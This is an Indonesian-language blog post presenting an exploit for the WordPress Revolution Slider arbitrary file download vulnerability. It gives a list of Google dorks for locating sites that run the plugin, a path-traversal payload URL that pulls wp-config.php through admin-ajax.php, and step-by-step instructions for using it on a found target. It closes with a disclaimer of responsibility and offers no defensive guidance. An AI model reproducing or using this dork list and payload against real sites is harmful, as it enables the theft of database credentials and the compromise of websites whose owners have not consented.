Naufal Ardhani - Halo sobat kali ini saya akan membahas Exploit Wordpress Revslider Arbritary File Download pada exploit ini anda dapat mendownload file file penting yang ada di dalam server web tersebut khususnya web yang menggunakan cms Wordpress tapi tidak semua web yang menggunakan cms tersebut rentan dengan exploit ini.
Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.
Dork :
- inurl:wp-content/plugins/revslider/
- inurl:revslider
- inurl:revslider_admin.php
- inurl:revslider_front.php
- inurl:plugins/revslider/
- intext:Powered by Revslider
- intitle:"Index Of/ revslider"
- intitle:"Index Of/wp-content/themes/revslider"
- intitle:"Index Of/wp-content/plugins/revslider"
- intitle:"Index Of/admin/revslider"
- intitle:"Index Of/fr/revslider"
- intitle:"Index Of/en/revslider"
- intitle:"Index Of/us/revslider"
- intitle:"Index Of/ar/revslider"
- intitle:"Index Of/es/revslider"
- intitle:"Index Of/de/revslider"
Exploit :
- /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Step :
- Dorking dengan dork yang sudah disediakan.
- Disini saya sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
- Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.
Sekian saja Exploit Wordpress Revslider Arbitary File Download Vulnerability yang saya bagikan semoga bermanfaat dan saya tidak bertanggung atas apa yang anda lakukan terimakasih.
comment 0 Post a Comment
more_vert